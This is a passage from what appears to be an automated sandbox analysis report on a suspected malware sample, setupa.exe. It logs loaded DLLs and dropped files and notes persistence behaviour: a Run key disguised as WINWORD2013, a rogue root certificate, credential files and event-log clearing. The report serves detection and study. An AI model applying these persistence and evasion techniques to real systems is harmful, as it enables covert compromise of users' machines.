                      Source: C:\Users\user\Desktop\setupa.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeSection loaded: dlnashext.dllJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeSection loaded: wpdshext.dllJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeSection loaded: pcacli.dllJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeSection loaded: sfc_os.dllJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeSection loaded: textinputframework.dllJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeSection loaded: coreuicomponents.dllJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Windows\System32\lsass.exeSection loaded: ngcpopkeysrv.dllJump to behavior
                      Source: C:\Windows\System32\lsass.exeSection loaded: devobj.dllJump to behavior
                      Source: C:\Windows\System32\lsass.exeSection loaded: pcpksp.dllJump to behavior
                      Source: C:\Windows\System32\lsass.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\System32\lsass.exeSection loaded: tbs.dllJump to behavior
                      Source: C:\Windows\System32\dllhost.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\dllhost.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\dllhost.exeSection loaded: thumbcache.dllJump to behavior
                      Source: C:\Windows\System32\dllhost.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Program Files\upupoo-classicshell.exeSection loaded: classicstartmenudll.dllJump to behavior
                      Source: C:\Program Files\upupoo-classicshell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: napinsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: pnrpnsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wshbth.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: nlaapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winrnr.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dxgi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dinput8.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: inputhost.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: coreuicomponents.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: devenum.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: devobj.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: msdmo.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: avicap32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: msvfw32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: avicap32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: msvfw32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: avicap32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: msvfw32.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wlidsvc.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: clipc.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: msxml6.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wtsapi32.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: winsta.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: gamestreamingext.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: msauserext.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: tbs.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptnet.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptngc.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: devobj.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ncryptprov.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: elscore.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: elstrans.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\Public\Documents\upupoo-classicshell.exeSection loaded: classicstartmenudll.dllJump to behavior
                      Source: C:\Users\Public\Documents\upupoo-classicshell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: napinsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: pnrpnsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wshbth.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: nlaapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winrnr.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dxgi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dinput8.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: inputhost.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: coreuicomponents.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: devenum.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: devobj.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: msdmo.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: avicap32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: msvfw32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{62BE5D10-60EB-11d0-BD3B-00A0C911CE86}\InprocServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\setupa.exeDirectory created: C:\Program Files\ClassicStartMenuDLL.dllJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeDirectory created: C:\Program Files\upup.oxJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeDirectory created: C:\Program Files\upupoo-classicshell.exeJump to behavior
                      Source: setupa.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                      Source: setupa.exeStatic PE information: Image base 0x140000000 > 0x60000000
                      Source: setupa.exeStatic file information: File size 1695232 > 1048576
                      Source: setupa.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x10a200
                      Source: setupa.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                      Source: Binary string: \KinndigitDll\x64\Release\KinndigitDll.pdb source: setupa.exe, 00000000.00000003.2200525100.000001F5DCBB6000.00000004.00000020.00020000.00000000.sdmp, lsass.exe, lsass.exe, 00000001.00000002.3348718884.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, lsass.exe, 00000001.00000000.2091116393.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp
                      Source: Binary string: c:\Users\Sware\Desktop\classic-shell\Classic-Shell-4.3.1\ClassicShellSrc\ClassicStartMenu\Setup\ClassicStartMenu.pdb source: upupoo-classicshell.exe, 00000003.00000000.2164624884.0000000000C33000.00000002.00000001.01000000.00000006.sdmp, upupoo-classicshell.exe, 00000003.00000002.2357440949.0000000000C33000.00000002.00000001.01000000.0000000B.sdmp, upupoo-classicshell.exe, 0000000B.00000002.2354492979.0000000000C33000.00000002.00000001.01000000.0000000B.sdmp, upupoo-classicshell.exe, 0000000B.00000000.2254604894.0000000000C33000.00000002.00000001.01000000.0000000B.sdmp, upupoo-classicshell.exe.0.dr
                      Source: C:\Users\user\Desktop\setupa.exeCode function: 0_2_00007FF689641361 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,FreeLibrary,0_2_00007FF689641361
                      Source: setupa.exeStatic PE information: section name: .00cfg
                      Source: C:\Windows\System32\lsass.exeCode function: 1_2_00000140ADFD8235 push rsi; ret 1_2_00000140ADFD8236
                      Source: C:\Windows\System32\lsass.exeCode function: 1_2_00000140ADFD8BDD push rcx; retf 003Fh1_2_00000140ADFD8BDE
                      Source: C:\Program Files\upupoo-classicshell.exeCode function: 3_2_00C266C9 push ecx; ret 3_2_00C266DC
                      Source: C:\Program Files\upupoo-classicshell.exeCode function: 3_2_6E0A9316 push ecx; ret 3_2_6E0A9329
                      Source: C:\Program Files\upupoo-classicshell.exeCode function: 3_2_6E0A8172 push ecx; ret 3_2_6E0A8185
                      Source: C:\Program Files\upupoo-classicshell.exeCode function: 3_2_10004146 push ecx; ret 3_2_10004159
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02589E65 push ecx; ret 4_2_02589E78
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_04E13470 push ebp; retf 4_2_04E13474
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_04E1344B push ebp; retf 4_2_04E13474
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_04E13450 push ebp; retf 4_2_04E13474
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_04E1B0B8 push eax; ret 4_2_04E1B119
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_04E1B168 push eax; ret 4_2_04E1B119
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_04E04395 push ecx; ret 4_2_04E043A8
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02A09832 push ecx; ret 4_2_02A09845
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_04C83D54 push ecx; ret 4_2_04C83D67
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_04C92600 push ebp; retf 4_2_04C92633
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_04C91AE4 push ss; iretd 4_2_04C91AF5
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_04C91B07 push cs; iretd 4_2_04C91B08
                      Source: C:\Users\Public\Documents\upupoo-classicshell.exeCode function: 11_2_10004146 push ecx; ret 11_2_10004159
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_02F69E65 push ecx; ret 12_2_02F69E78
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_052D3470 push ebp; retf 12_2_052D3474
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_052D3447 push ebp; retf 12_2_052D3474
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_052D3450 push ebp; retf 12_2_052D3474
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_052DB168 push eax; ret 12_2_052DB119
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_052DB0B8 push eax; ret 12_2_052DB119
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_052C4395 push ecx; ret 12_2_052C43A8
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_02ED9832 push ecx; ret 12_2_02ED9845
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_05143D54 push ecx; ret 12_2_05143D67
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_05152600 push ebp; retf 12_2_05152633
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_05151B07 push cs; iretd 12_2_05151B08
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_05151AE4 push ss; iretd 12_2_05151AF5

                      Persistence and Installation Behavior

                      barindex
                      Creates files in the system32 config directory
                      Source: C:\Windows\System32\lsass.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5DJump to behavior
                      Source: C:\Windows\System32\lsass.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5DJump to behavior
                      Installs new ROOT certificates
                      Source: C:\Windows\System32\lsass.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                      Source: C:\Windows\System32\lsass.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeFile created: C:\Program Files\upupoo-classicshell.exeJump to dropped file
                      Source: C:\Program Files\upupoo-classicshell.exeFile created: C:\Users\Public\Documents\upupoo-classicshell.exe (copy)Jump to dropped file
                      Source: C:\Program Files\upupoo-classicshell.exeFile created: C:\Users\Public\Documents\ClassicStartMenuDLL.dll (copy)Jump to dropped file
                      Source: C:\Users\user\Desktop\setupa.exeFile created: C:\Program Files\ClassicStartMenuDLL.dllJump to dropped file
                      Source: C:\Users\user\Desktop\setupa.exeFile created: C:\Program Files\upupoo-classicshell.exeJump to dropped file
                      Source: C:\Users\user\Desktop\setupa.exeFile created: C:\Program Files\ClassicStartMenuDLL.dllJump to dropped file
                      Source: C:\Program Files\upupoo-classicshell.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run WINWORD2013Jump to behavior
                      Source: C:\Program Files\upupoo-classicshell.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run WINWORD2013Jump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_04DFB410 OpenEventLogW,OpenEventLogW,ClearEventLogW,CloseEventLog,4_2_04DFB410
                      Source: C:\Users\user\Desktop\setupa.exeCode function: 0_2_00007FF689644142 EncodePointer,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00007FF689644142
                      Source: C:\Windows\System32\lsass.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
